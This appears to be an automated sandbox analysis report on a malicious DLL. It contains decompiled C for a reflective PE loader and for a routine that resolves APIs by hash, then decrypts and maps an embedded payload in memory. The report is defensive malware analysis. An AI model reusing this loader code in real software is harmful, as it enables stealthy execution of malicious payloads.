19003->19005 19006 100199d4 __mbsnbcpy_s_l 66 API calls 19004->19006 19005->19018 19006->19018 19014 1001fb4c 19007->19014 19015 1001fa84 19007->19015 19008 1001fac3 19012 1001fb23 19008->19012 19022 1001fac9 19008->19022 19009 1001fab6 19009->19008 19010 1001fb7d 19009->19010 19016 10017d62 __lseeki64 66 API calls 19010->19016 19010->19018 19017 10017d62 __lseeki64 66 API calls 19012->19017 19013 10019efd __mbsnbcpy_s_l 76 API calls 19013->19014 19014->19010 19014->19013 19014->19018 19015->19008 19015->19009 19023 10019efd 19015->19023 19016->19018 19019 1001fb2a 19017->19019 19018->18979 19020 1001c596 __lseeki64 4 API calls 19019->19020 19020->19018 19021 10019efd __mbsnbcpy_s_l 76 API calls 19021->19022 19022->19018 19022->19021 19024 10019eac x_ismbbtype_l 76 API calls 19023->19024 19025 10019f0e 19024->19025 19025->19015 19027 10013975 19026->19027 19028 1000a106 19026->19028 19029 1000a0a7 ~_Task_impl RaiseException 19027->19029 19028->18989 19029->19028 19030->18918 19034 10013a6c 19031->19034 19035 10013a73 19034->19035 19036 10013a78 19034->19036 19037 1000a0db ~_Task_impl 2 API calls 19035->19037 19036->18935 19037->19036

                                                                                                        Executed Functions

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 0 10002900-10002927 call 10001fe0 3 10002930-10002941 0->3 4 10002929-1000292b 0->4 6 10002943-10002950 SetLastError 3->6 7 10002955-10002970 call 10001fe0 3->7 5 10002d1a-10002d1d 4->5 6->5 10 10002972-10002974 7->10 11 10002979-1000298e 7->11 10->5 12 10002990-1000299d SetLastError 11->12 13 100029a2-100029af 11->13 12->5 14 100029b1-100029be SetLastError 13->14 15 100029c3-100029cc 13->15 14->5 16 100029e0-10002a01 15->16 17 100029ce-100029db SetLastError 15->17 18 10002a15-10002a1f 16->18 17->5 19 10002a21-10002a28 18->19 20 10002a57-10002a92 GetNativeSystemInfo 18->20 21 10002a38-10002a44 19->21 22 10002a2a-10002a36 19->22 23 10002a94-10002aa1 SetLastError 20->23 24 10002aa6-10002ac5 VirtualAlloc 20->24 25 10002a47-10002a4d 21->25 22->25 23->5 26 10002af2-10002b0a GetProcessHeap HeapAlloc 24->26 27 10002ac7-10002ae1 VirtualAlloc 24->27 28 10002a55 25->28 29 10002a4f-10002a52 25->29 31 10002b2c-10002b90 call 10001fe0 26->31 32 10002b0c-10002b27 VirtualFree SetLastError 26->32 27->26 30 10002ae3-10002aed SetLastError 27->30 28->18 29->28 30->5 36 10002b92 31->36 37 10002b9c-10002c01 VirtualAlloc call 10001e60 call 10002010 31->37 32->5 38 10002d0c-10002d18 call 10002ec0 36->38 45 10002c03 37->45 46 10002c0d-10002c1e 37->46 38->5 45->38 47 10002c20-10002c36 call 10002500 46->47 48 10002c38-10002c3b 46->48 50 10002c42-10002c50 call 10002670 47->50 48->50 54 10002c52 50->54 55 10002c5c-10002c6a call 10002300 50->55 54->38 58 10002c76-10002c84 call 10002480 55->58 59 10002c6c 55->59 62 10002c86 58->62 63 10002c8d-10002c96 58->63 59->38 62->38 64 10002c98-10002c9f 63->64 65 10002cfd-10002d00 63->65 67 10002ca1-10002cc2 64->67 68 10002cea-10002cf8 64->68 66 10002d07-10002d0a 65->66 66->5 70 10002cc6-10002ccd 67->70 69 10002cfb 68->69 69->66 71 10002cde-10002ce8 70->71 72 10002ccf-10002cda SetLastError 70->72 71->69 72->38
                                                                                                        C-Code - Quality: 89%
                                                                                                        			E10002900(intOrPtr __ecx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                        				void* _v8;
                                                                                                        				void* _v12;
                                                                                                        				signed short* _v16;
                                                                                                        				void* _v20;
                                                                                                        				void* _v24;
                                                                                                        				long _v28;
                                                                                                        				signed int _v32;
                                                                                                        				intOrPtr _v64;
                                                                                                        				char _v68;
                                                                                                        				void* _v72;
                                                                                                        				intOrPtr _v76;
                                                                                                        				intOrPtr* _v80;
                                                                                                        				intOrPtr _v84;
                                                                                                        				void* _v88;
                                                                                                        				intOrPtr _v92;
                                                                                                        				intOrPtr _v96;
                                                                                                        				intOrPtr _v100;
                                                                                                        				void* _t180;
                                                                                                        				void* _t191;
                                                                                                        				void* _t198;
                                                                                                        				void* _t202;
                                                                                                        				intOrPtr _t209;
                                                                                                        				void* _t220;
                                                                                                        				intOrPtr _t269;
                                                                                                        				intOrPtr _t278;
                                                                                                        				intOrPtr _t326;
                                                                                                        
                                                                                                        				_v100 = __ecx;
                                                                                                        				_v72 = 0;
                                                                                                        				_v20 = 0;
                                                                                                        				if(E10001FE0(_v100, _a8, 0x40) != 0) {
                                                                                                        					_v16 = _a4;
                                                                                                        					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
                                                                                                        						_t10 =  &(_v16[0x1e]); // 0x47e81005
                                                                                                        						if(E10001FE0(_v100, _a8,  *_t10 + 0xf8) != 0) {
                                                                                                        							_t15 =  &(_v16[0x1e]); // 0x47e81005
                                                                                                        							_v80 = _a4 +  *_t15;
                                                                                                        							if( *_v80 == 0x4550) {
                                                                                                        								if(( *(_v80 + 4) & 0x0000ffff) == 0x14c) {
                                                                                                        									if(( *(_v80 + 0x38) & 0x00000001) == 0) {
                                                                                                        										_v84 = _v80 + ( *(_v80 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                        										_v32 =  *(_v80 + 0x38);
                                                                                                        										_v12 = 0;
                                                                                                        										while(_v12 < ( *(_v80 + 6) & 0x0000ffff)) {
                                                                                                        											if( *((intOrPtr*)(_v84 + 0x10)) != 0) {
                                                                                                        												_v88 =  *((intOrPtr*)(_v84 + 0xc)) +  *((intOrPtr*)(_v84 + 0x10));
                                                                                                        											} else {
                                                                                                        												_v88 =  *((intOrPtr*)(_v84 + 0xc)) + _v32;
                                                                                                        											}
                                                                                                        											if(_v88 > _v20) {
                                                                                                        												_v20 = _v88;
                                                                                                        											}
                                                                                                        											_v12 = _v12 + 1;
                                                                                                        											_v84 = _v84 + 0x28;
                                                                                                        										}
                                                                                                        										__imp__GetNativeSystemInfo( &_v68); // executed
                                                                                                        										_v28 =  *((intOrPtr*)(_v80 + 0x50)) + _v64 - 0x00000001 &  !(_v64 - 1);
                                                                                                        										_t65 = _v64 - 1; // -1
                                                                                                        										if(_v28 == (_v20 + _t65 &  !(_v64 - 1))) {
                                                                                                        											_t180 = VirtualAlloc( *(_v80 + 0x34), _v28, 0x3000, 4); // executed
                                                                                                        											_v24 = _t180;
                                                                                                        											if(_v24 != 0) {
                                                                                                        												L26:
                                                                                                        												_v72 = HeapAlloc(GetProcessHeap(), 8, 0x34);
                                                                                                        												if(_v72 != 0) {
                                                                                                        													 *((intOrPtr*)(_v72 + 4)) = _v24;
                                                                                                        													asm("sbb edx, edx");
                                                                                                        													 *(_v72 + 0x14) =  ~( ~( *(_v80 + 0x16) & 0x2000));
                                                                                                        													 *((intOrPtr*)(_v72 + 0x1c)) = _a12;
                                                                                                        													 *((intOrPtr*)(_v72 + 0x20)) = _a16;
                                                                                                        													 *((intOrPtr*)(_v72 + 0x24)) = _a20;
                                                                                                        													 *((intOrPtr*)(_v72 + 0x28)) = _a24;
                                                                                                        													 *((intOrPtr*)(_v72 + 0x30)) = _v64;
                                                                                                        													if(E10001FE0(_v100, _a8,  *(_v80 + 0x54)) != 0) {
                                                                                                        														_t191 = VirtualAlloc(_v24,  *(_v80 + 0x54), 0x1000, 4); // executed
                                                                                                        														_v8 = _t191;
                                                                                                        														E10001E60(_v8, _v16,  *(_v80 + 0x54));
                                                                                                        														_t115 =  &(_v16[0x1e]); // 0x47e81005
                                                                                                        														 *_v72 = _v8 +  *_t115;
                                                                                                        														 *((intOrPtr*)( *_v72 + 0x34)) = _v24;
                                                                                                        														_t198 = E10002010(_v100, _a4, _a8, _v80, _v72); // executed
                                                                                                        														if(_t198 != 0) {
                                                                                                        															_t269 =  *((intOrPtr*)( *_v72 + 0x34)) -  *(_v80 + 0x34);
                                                                                                        															_v76 = _t269;
                                                                                                        															if(_t269 == 0) {
                                                                                                        																 *((intOrPtr*)(_v72 + 0x18)) = 1;
                                                                                                        															} else {
                                                                                                        																 *((intOrPtr*)(_v72 + 0x18)) = E10002500(_v100, _v72, _v76);
                                                                                                        															}
                                                                                                        															if(E10002670(_v100, _v72) != 0) {
                                                                                                        																_t202 = E10002300(_v100, _v72); // executed
                                                                                                        																if(_t202 != 0) {
                                                                                                        																	if(E10002480(_v100, _v72) != 0) {
                                                                                                        																		if( *((intOrPtr*)( *_v72 + 0x28)) == 0) {
                                                                                                        																			 *(_v72 + 0x2c) = 0;
                                                                                                        																			L49:
                                                                                                        																			return _v72;
                                                                                                        																		}
                                                                                                        																		if( *(_v72 + 0x14) == 0) {
                                                                                                        																			 *(_v72 + 0x2c) = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
                                                                                                        																			L47:
                                                                                                        																			goto L49;
                                                                                                        																		}
                                                                                                        																		_v96 = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
                                                                                                        																		_t209 =  *0x10058ed8; // 0x0
                                                                                                        																		_t278 =  *0x10058ed4; // 0x1
                                                                                                        																		_t326 =  *0x10058ed0; // 0x10000000
                                                                                                        																		_v92 = _v96(_t326, _t278, _t209);
                                                                                                        																		if(_v92 != 0) {
                                                                                                        																			 *((intOrPtr*)(_v72 + 0x10)) = 1;
                                                                                                        																			goto L47;
                                                                                                        																		}
                                                                                                        																		SetLastError(0x45a);
                                                                                                        																		L50:
                                                                                                        																		E10002EC0(_v100, _v72);
                                                                                                        																		return 0;
                                                                                                        																	}
                                                                                                        																	goto L50;
                                                                                                        																}
                                                                                                        																goto L50;
                                                                                                        															}
                                                                                                        															goto L50;
                                                                                                        														}
                                                                                                        														goto L50;
                                                                                                        													}
                                                                                                        													goto L50;
                                                                                                        												}
                                                                                                        												VirtualFree(_v24, 0, 0x8000);
                                                                                                        												SetLastError(0xe);
                                                                                                        												return 0;
                                                                                                        											}
                                                                                                        											_t220 = VirtualAlloc(0, _v28, 0x3000, 4); // executed
                                                                                                        											_v24 = _t220;
                                                                                                        											if(_v24 != 0) {
                                                                                                        												goto L26;
                                                                                                        											}
                                                                                                        											SetLastError(0xe);
                                                                                                        											return 0;
                                                                                                        										}
                                                                                                        										SetLastError(0xc1);
                                                                                                        										return 0;
                                                                                                        									}
                                                                                                        									SetLastError(0xc1);
                                                                                                        									return 0;
                                                                                                        								}
                                                                                                        								SetLastError(0xc1);
                                                                                                        								return 0;
                                                                                                        							}
                                                                                                        							SetLastError(0xc1);
                                                                                                        							return 0;
                                                                                                        						}
                                                                                                        						return 0;
                                                                                                        					}
                                                                                                        					SetLastError(0xc1);
                                                                                                        					return 0;
                                                                                                        				}
                                                                                                        				return 0;
                                                                                                        			}





























                                                                                                        0x10002906
                                                                                                        0x10002909
                                                                                                        0x10002910
                                                                                                        0x10002927
                                                                                                        0x10002933
                                                                                                        0x10002941
                                                                                                        0x10002958
                                                                                                        0x10002970
                                                                                                        0x1000297f
                                                                                                        0x10002982
                                                                                                        0x1000298e
                                                                                                        0x100029af
                                                                                                        0x100029cc
                                                                                                        0x100029ee
                                                                                                        0x100029f7
                                                                                                        0x100029fa
                                                                                                        0x10002a15
                                                                                                        0x10002a28
                                                                                                        0x10002a44
                                                                                                        0x10002a2a
                                                                                                        0x10002a33
                                                                                                        0x10002a33
                                                                                                        0x10002a4d
                                                                                                        0x10002a52
                                                                                                        0x10002a52
                                                                                                        0x10002a09
                                                                                                        0x10002a12
                                                                                                        0x10002a12
                                                                                                        0x10002a5b
                                                                                                        0x10002a78
                                                                                                        0x10002a81
                                                                                                        0x10002a92
                                                                                                        0x10002ab8
                                                                                                        0x10002abe
                                                                                                        0x10002ac5
                                                                                                        0x10002af2
                                                                                                        0x10002b03
                                                                                                        0x10002b0a
                                                                                                        0x10002b32
                                                                                                        0x10002b44
                                                                                                        0x10002b4b
                                                                                                        0x10002b54
                                                                                                        0x10002b5d
                                                                                                        0x10002b66
                                                                                                        0x10002b6f
                                                                                                        0x10002b78
                                                                                                        0x10002b90
                                                                                                        0x10002bae
                                                                                                        0x10002bb4
                                                                                                        0x10002bc6
                                                                                                        0x10002bd4
                                                                                                        0x10002bda
                                                                                                        0x10002be4
                                                                                                        0x10002bfa
                                                                                                        0x10002c01
                                                                                                        0x10002c18
                                                                                                        0x10002c1b
                                                                                                        0x10002c1e
                                                                                                        0x10002c3b
                                                                                                        0x10002c20
                                                                                                        0x10002c33
                                                                                                        0x10002c33
                                                                                                        0x10002c50
                                                                                                        0x10002c63
                                                                                                        0x10002c6a
                                                                                                        0x10002c84
                                                                                                        0x10002c96
                                                                                                        0x10002d00
                                                                                                        0x10002d07
                                                                                                        0x00000000
                                                                                                        0x10002d07
                                                                                                        0x10002c9f
                                                                                                        0x10002cf8
                                                                                                        0x10002cfb
                                                                                                        0x00000000
                                                                                                        0x10002cfb
                                                                                                        0x10002cac
                                                                                                        0x10002caf
                                                                                                        0x10002cb5
                                                                                                        0x10002cbc
                                                                                                        0x10002cc6
                                                                                                        0x10002ccd
                                                                                                        0x10002ce1
                                                                                                        0x00000000
                                                                                                        0x10002ce1
                                                                                                        0x10002cd4
                                                                                                        0x10002d0c
                                                                                                        0x10002d13
                                                                                                        0x00000000
                                                                                                        0x10002d18
                                                                                                        0x00000000
                                                                                                        0x10002c86
                                                                                                        0x00000000
                                                                                                        0x10002c6c
                                                                                                        0x00000000
                                                                                                        0x10002c52
                                                                                                        0x00000000
                                                                                                        0x10002c03
                                                                                                        0x00000000
                                                                                                        0x10002b92
                                                                                                        0x10002b17
                                                                                                        0x10002b1f
                                                                                                        0x00000000
                                                                                                        0x10002b25
                                                                                                        0x10002ad4
                                                                                                        0x10002ada
                                                                                                        0x10002ae1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10002ae5
                                                                                                        0x00000000
                                                                                                        0x10002aeb
                                                                                                        0x10002a99
                                                                                                        0x00000000
                                                                                                        0x10002a9f
                                                                                                        0x100029d3
                                                                                                        0x00000000
                                                                                                        0x100029d9
                                                                                                        0x100029b6
                                                                                                        0x00000000
                                                                                                        0x100029bc
                                                                                                        0x10002995
                                                                                                        0x00000000
                                                                                                        0x1000299b
                                                                                                        0x00000000
                                                                                                        0x10002972
                                                                                                        0x10002948
                                                                                                        0x00000000
                                                                                                        0x1000294e
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                          • Part of subcall function 10001FE0: SetLastError.KERNEL32(0000000D,?,?,10002925,10008AC6,00000040), ref: 10001FF1
                                                                                                        • SetLastError.KERNEL32(000000C1,10008AC6,00000040), ref: 10002948
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 1452528299-0
                                                                                                        • Opcode ID: 08cff93c7344199116f568f774659ccae89e30fc42bc807c3f2613e3b5310ed8
                                                                                                        • Instruction ID: 2ef2df373ea658209f5af2a718a6df98ca9e1c1927523c70ceffa034f4820264
                                                                                                        • Opcode Fuzzy Hash: 08cff93c7344199116f568f774659ccae89e30fc42bc807c3f2613e3b5310ed8
                                                                                                        • Instruction Fuzzy Hash: 01E1F874A01219EFEB04CF94C994E9EB7B2FF88384F208559E905AB399D770AD46CF50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        C-Code - Quality: 90%
                                                                                                        			E100088E0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                        				struct HWND__* _v8;
                                                                                                        				void* _v12;
                                                                                                        				intOrPtr _v16;
                                                                                                        				intOrPtr _v20;
                                                                                                        				intOrPtr _v24;
                                                                                                        				struct HWND__* _v28;
                                                                                                        				struct HWND__* _v32;
                                                                                                        				long _v36;
                                                                                                        				int _v40;
                                                                                                        				intOrPtr _v44;
                                                                                                        				intOrPtr _v48;
                                                                                                        				intOrPtr _v52;
                                                                                                        				intOrPtr _v56;
                                                                                                        				void* __ebp;
                                                                                                        				void* _t38;
                                                                                                        				long _t45;
                                                                                                        				long _t47;
                                                                                                        				intOrPtr _t56;
                                                                                                        				void* _t63;
                                                                                                        				intOrPtr _t68;
                                                                                                        
                                                                                                        				_t79 = __esi;
                                                                                                        				_t78 = __edi;
                                                                                                        				_t64 = __ebx;
                                                                                                        				_v56 = _a8;
                                                                                                        				 *0x10058ed0 = _a4;
                                                                                                        				_t72 = _a8;
                                                                                                        				 *0x10058ed4 = _a8;
                                                                                                        				 *0x10058ed8 = _a12;
                                                                                                        				_v8 = 0;
                                                                                                        				_v36 = 0;
                                                                                                        				_v28 = 0;
                                                                                                        				_v32 = 0;
                                                                                                        				_v12 = 0;
                                                                                                        				_t38 = E10008860(__eflags); // executed
                                                                                                        				if(_t38 != 0) {
                                                                                                        					_push(0x10029b4c);
                                                                                                        					E1001771B(__ebx, _t72, __edi, __esi, __eflags);
                                                                                                        					return 0;
                                                                                                        				}
                                                                                                        				 *0x10056f08 = 0;
                                                                                                        				 *0x10056f0c = 0;
                                                                                                        				 *0x10056f10 = 0;
                                                                                                        				 *0x10056f18 = 0;
                                                                                                        				 *0x10056f14 = 0;
                                                                                                        				_v40 = 0x44368d;
                                                                                                        				_v52 = 0x3f8fc5;
                                                                                                        				_v20 = 0x3b272b;
                                                                                                        				_v24 = 0x2feb60;
                                                                                                        				_v44 = 0xdd3c;
                                                                                                        				_v48 = 0x47c;
                                                                                                        				_v36 = 0x24e00;
                                                                                                        				_v28 = E10006170(L"kernel32.dll");
                                                                                                        				_v32 = E10006170(L"ntdll.dll");
                                                                                                        				 *0x10058eb0 = E10006D50(_v28, 0x70e66e6b);
                                                                                                        				 *0x10058eb8 = E10006D50(_v28, 0x579606ae);
                                                                                                        				_t95 =  *0x10058eb8;
                                                                                                        				if( *0x10058eb8 == 0) {
                                                                                                        					_t45 = E10017716(0x10029b18);
                                                                                                        					_t47 = E10017716("8192") | 0x00001000;
                                                                                                        					__eflags = _t47;
                                                                                                        					_v12 = VirtualAlloc(0, _v36, _t47, _t45);
                                                                                                        				} else {
                                                                                                        					_t63 =  *0x10058eb8(0xffffffff, 0, _v36, E10017716("8192") | 0x00001000, E10017716(0x10029b18), 0); // executed
                                                                                                        					_v12 = _t63;
                                                                                                        				}
                                                                                                        				E10016A10(_t64, _t78, _t79, _v12, 0x10032098, _v36);
                                                                                                        				_t68 =  *0x10056f04; // 0x730f
                                                                                                        				_v16 = E1001703B(_t64, _v36, _t78, _t79, _t68);
                                                                                                        				E10002FA0(_t95, _v16, "vzyxQQjtnPpM1kMtP2^c)toAOgGzJnA(x4n)mZV?Zgqbqls>&28Kb303hUncVaad@?N*A%W2eBhDNd+m_Bl2cFznqh*vrDpHPGj%?_!pbLp", 0x6c);
                                                                                                        				E10004F00(_v16, _v12, _v36);
                                                                                                        				_t56 = E10002D20(0x10058ebc, _v12, _v36); // executed
                                                                                                        				 *0x10058edc = _t56;
                                                                                                        				ShowWindow(0, _v40);
                                                                                                        				return 1;
                                                                                                        			}























                                                                                                        0x100088e0
                                                                                                        0x100088e0
                                                                                                        0x100088e0
                                                                                                        0x100088e9
                                                                                                        0x100088ef
                                                                                                        0x100088f5
                                                                                                        0x100088f8
                                                                                                        0x10008901
                                                                                                        0x10008906
                                                                                                        0x1000890d
                                                                                                        0x10008914
                                                                                                        0x1000891b
                                                                                                        0x10008922
                                                                                                        0x10008929
                                                                                                        0x10008930
                                                                                                        0x10008966
                                                                                                        0x1000896b
                                                                                                        0x00000000
                                                                                                        0x10008973
                                                                                                        0x10008932
                                                                                                        0x1000893c
                                                                                                        0x10008946
                                                                                                        0x10008950
                                                                                                        0x1000895a
                                                                                                        0x1000897a
                                                                                                        0x10008981
                                                                                                        0x10008988
                                                                                                        0x1000898f
                                                                                                        0x10008996
                                                                                                        0x1000899d
                                                                                                        0x100089a4
                                                                                                        0x100089b8
                                                                                                        0x100089c8
                                                                                                        0x100089dc
                                                                                                        0x100089f2
                                                                                                        0x100089f7
                                                                                                        0x100089fe
                                                                                                        0x10008a3b
                                                                                                        0x10008a51
                                                                                                        0x10008a51
                                                                                                        0x10008a63
                                                                                                        0x10008a00
                                                                                                        0x10008a2b
                                                                                                        0x10008a31
                                                                                                        0x10008a31
                                                                                                        0x10008a73
                                                                                                        0x10008a7b
                                                                                                        0x10008a8a
                                                                                                        0x10008a98
                                                                                                        0x10008aac
                                                                                                        0x10008ac1
                                                                                                        0x10008ac6
                                                                                                        0x10008ad1
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                          • Part of subcall function 10008860: _malloc.LIBCMT ref: 1000886B
                                                                                                        • _printf.LIBCMT ref: 1000896B
                                                                                                        • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00024E00,00000000,00000000,00000000), ref: 10008A2B
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00024E00,00000000,00000000), ref: 10008A5D
                                                                                                        • _malloc.LIBCMT ref: 10008A82
                                                                                                        • ShowWindow.USER32(00000000,0044368D,00000000,00024E00), ref: 10008AD1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual_malloc$NumaShowWindow_printf
                                                                                                        • String ID: +';$8192$`/$kernel32.dll$ntdll.dll$vzyxQQjtnPpM1kMtP2^c)toAOgGzJnA(x4n)mZV?Zgqbqls>&28Kb303hUncVaad@?N*A%W2eBhDNd+m_Bl2cFznqh*vrDpHPGj%?_!pbLp
                                                                                                        • API String ID: 1487653210-3670691644
                                                                                                        • Opcode ID: 230bbdfcd20e835c4d7365e9bc9cc9309c602f396e76a36ffbf0d77b2387037d
                                                                                                        • Instruction ID: 74e036033439e47f0f6271ee42a165f027743cdfe4c2c4d01037afcb8f86e406
                                                                                                        • Opcode Fuzzy Hash: 230bbdfcd20e835c4d7365e9bc9cc9309c602f396e76a36ffbf0d77b2387037d
                                                                                                        • Instruction Fuzzy Hash: FE5141F5D00214AFEB00CF90EC96BAE77B4FB48344F144528E909BB345E775A6448BA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        C-Code - Quality: 80%
                                                                                                        			E10013A9B() {
                                                                                                        				struct _CRITICAL_SECTION* _v4;
                                                                                                        				char _v28;
                                                                                                        				char _v36;
                                                                                                        				char _v44;
                                                                                                        				intOrPtr _v56;
                                                                                                        				void* __ebx;
                                                                                                        				intOrPtr __ecx;
                                                                                                        				signed int __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				struct _CRITICAL_SECTION* _t39;
                                                                                                        				intOrPtr _t40;
                                                                                                        				void* _t41;
                                                                                                        				long _t44;
                                                                                                        				void* _t45;
                                                                                                        				signed int* _t51;
                                                                                                        				intOrPtr _t64;
                                                                                                        				long _t68;
                                                                                                        				void* _t69;
                                                                                                        				void* _t70;
                                                                                                        				signed int _t72;
                                                                                                        				intOrPtr _t78;
                                                                                                        				signed int _t82;
                                                                                                        				void* _t86;
                                                                                                        				signed int _t88;
                                                                                                        				void* _t90;
                                                                                                        				void* _t91;
                                                                                                        				void* _t93;
                                                                                                        
                                                                                                        				_push(_t72);
                                                                                                        				_push(_t69);
                                                                                                        				_push(_t88);
                                                                                                        				_t86 = _t72;
                                                                                                        				_t1 = _t86 + 0x1c; // 0x1005aaa8
                                                                                                        				_t39 = _t1;
                                                                                                        				_v4 = _t39;
                                                                                                        				EnterCriticalSection(_t39);
                                                                                                        				_t3 = _t86 + 4; // 0x20
                                                                                                        				_t40 =  *_t3;
                                                                                                        				_t4 = _t86 + 8; // 0x3
                                                                                                        				_t82 =  *_t4;
                                                                                                        				if(_t82 >= _t40) {
                                                                                                        					L7:
                                                                                                        					_t82 = 1;
                                                                                                        					__eflags = _t40 - 1;
                                                                                                        					if(_t40 <= 1) {
                                                                                                        						L12:
                                                                                                        						_t21 = _t40 + 0x20; // 0x40
                                                                                                        						_t88 = _t21;
                                                                                                        						_t22 = _t86 + 0x10; // 0xd74820
                                                                                                        						_t41 =  *_t22;
                                                                                                        						__eflags = _t41;
                                                                                                        						if(__eflags != 0) {
                                                                                                        							_t69 = GlobalHandle(_t41);
                                                                                                        							GlobalUnlock(_t69);
                                                                                                        							_t44 = E100134F9(_t72, __eflags, _t88, 8);
                                                                                                        							_t72 = 0x2002;
                                                                                                        							_t45 = GlobalReAlloc(_t69, _t44, ??);
                                                                                                        						} else {
                                                                                                        							_t68 = E100134F9(_t72, __eflags, _t88, 8);
                                                                                                        							_pop(_t72);
                                                                                                        							_t45 = GlobalAlloc(2, _t68); // executed
                                                                                                        						}
                                                                                                        						__eflags = _t45;
                                                                                                        						if(_t45 != 0) {
                                                                                                        							_t70 = GlobalLock(_t45);
                                                                                                        							_t25 = _t86 + 4; // 0x20
                                                                                                        							__eflags = _t88 -  *_t25 << 3;
                                                                                                        							E100174D0(_t82, _t70 +  *_t25 * 8, 0, _t88 -  *_t25 << 3);
                                                                                                        							 *(_t86 + 4) = _t88;
                                                                                                        							 *(_t86 + 0x10) = _t70;
                                                                                                        							goto L20;
                                                                                                        						} else {
                                                                                                        							_t23 = _t86 + 0x10; // 0xd74820
                                                                                                        							_t86 =  *_t23;
                                                                                                        							__eflags = _t86;
                                                                                                        							if(_t86 != 0) {
                                                                                                        								GlobalLock(GlobalHandle(_t86));
                                                                                                        							}
                                                                                                        							LeaveCriticalSection(_v4);
                                                                                                        							_push(_t88);
                                                                                                        							_t90 = _t93;
                                                                                                        							_push(_t72);
                                                                                                        							_v28 = 0x10057168;
                                                                                                        							E10017C83( &_v28, 0x1002e258);
                                                                                                        							asm("int3");
                                                                                                        							_push(_t90);
                                                                                                        							_t91 = _t93;
                                                                                                        							_push(_t72);
                                                                                                        							_v36 = 0x10057200;
                                                                                                        							E10017C83( &_v36, 0x1002e2b8);
                                                                                                        							asm("int3");
                                                                                                        							_push(_t91);
                                                                                                        							_push(_t72);
                                                                                                        							_v44 = 0x10057298;
                                                                                                        							E10017C83( &_v44, 0x1002e2fc);
                                                                                                        							asm("int3");
                                                                                                        							_push(4);
                                                                                                        							E10017BC1(E10027DEC, _t69, _t82, _t86);
                                                                                                        							_t78 = E10013965(0x104);
                                                                                                        							_v56 = _t78;
                                                                                                        							_t64 = 0;
                                                                                                        							_v44 = 0;
                                                                                                        							if(_t78 != 0) {
                                                                                                        								_t64 = E1000CF71(_t78);
                                                                                                        							}
                                                                                                        							return E10017C60(_t64);
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						_t18 = _t86 + 0x10; // 0xd74820
                                                                                                        						_t72 =  *_t18 + 8;
                                                                                                        						__eflags = _t72;
                                                                                                        						while(1) {
                                                                                                        							__eflags =  *_t72 & 0x00000001;
                                                                                                        							if(( *_t72 & 0x00000001) == 0) {
                                                                                                        								break;
                                                                                                        							}
                                                                                                        							_t82 = _t82 + 1;
                                                                                                        							_t72 = _t72 + 8;
                                                                                                        							__eflags = _t82 - _t40;
                                                                                                        							if(_t82 < _t40) {
                                                                                                        								continue;
                                                                                                        							}
                                                                                                        							break;
                                                                                                        						}
                                                                                                        						__eflags = _t82 - _t40;
                                                                                                        						if(_t82 < _t40) {
                                                                                                        							goto L20;
                                                                                                        						} else {
                                                                                                        							goto L12;
                                                                                                        						}
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					_t13 = __esi + 0x10; // 0xd74820
                                                                                                        					__ecx =  *_t13;
                                                                                                        					__eflags =  *(__ecx + __edi * 8) & 0x00000001;
                                                                                                        					if(( *(__ecx + __edi * 8) & 0x00000001) == 0) {
                                                                                                        						L20:
                                                                                                        						_t30 = _t86 + 0xc; // 0x3
                                                                                                        						__eflags = _t82 -  *_t30;
                                                                                                        						if(_t82 >=  *_t30) {
                                                                                                        							_t31 = _t82 + 1; // 0x4
                                                                                                        							 *((intOrPtr*)(_t86 + 0xc)) = _t31;
                                                                                                        						}
                                                                                                        						_t33 = _t86 + 0x10; // 0xd74820
